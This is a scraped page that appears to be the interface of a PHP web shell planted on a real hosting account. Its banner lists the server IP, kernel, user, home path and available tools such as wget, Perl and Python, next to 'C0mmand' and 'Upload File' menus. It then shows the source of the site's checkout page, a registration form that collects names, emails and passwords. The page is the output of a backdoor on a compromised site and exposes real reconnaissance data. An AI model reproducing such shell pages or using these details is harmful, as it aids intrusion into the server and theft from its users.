Server IP : 103.53.40.154 / Your IP : 3.146.34.148 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/lizatilessolution.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include("site-header.php"); ?> <nav class="breadcrumb" aria-label="breadcrumbs" style="margin-top: 90px;"> <h1> Checkout</h1> <a href="<?=$site_url?>" title="Back to the home">Home</a> <span aria-hidden="true" class="breadcrumb__sep">/</span> <span> Checkout</span> </nav> <div class="dt-sc-hr-invisible-large"></div> <main class="main-content "> <div class="wrapper"> <div class="grid__item"> <div class="container"> <div class="grid"> <div class="grid__item small--text-center"> <div class="register-form"> <form method="post" action="https://bath-fixtures.myshopify.com/account" id="create_customer" accept-charset="UTF-8"><input type="hidden" name="form_type" value="create_customer" /><input type="hidden" name="utf8" value="✓" /> <label for="FirstName" class="label--hidden">First Name</label> <input type="text" name="customer[first_name]" id="FirstName" placeholder="First Name" autocapitalize="words" autofocus> <label for="LastName" class="label--hidden">Last Name</label> <input type="text" name="customer[last_name]" id="LastName" placeholder="Last Name" autocapitalize="words"> <label for="Email" class="label--hidden">Email</label> <input type="email" name="customer[email]" id="Email" placeholder="Email" autocorrect="off" autocapitalize="off"> <label for="CreatePassword" class="label--hidden">Password</label> <input type="password" name="customer[password]" id="CreatePassword" placeholder="Password" > <p> <input type="submit" value="Create" class="btn"> </p> <a href="../index.html">Return to Store</a> </form> </div> </div> </div> </div> </div> </div> <div class="dt-sc-hr-invisible-large"></div> </main> <?php include("site-footer.php"); ?>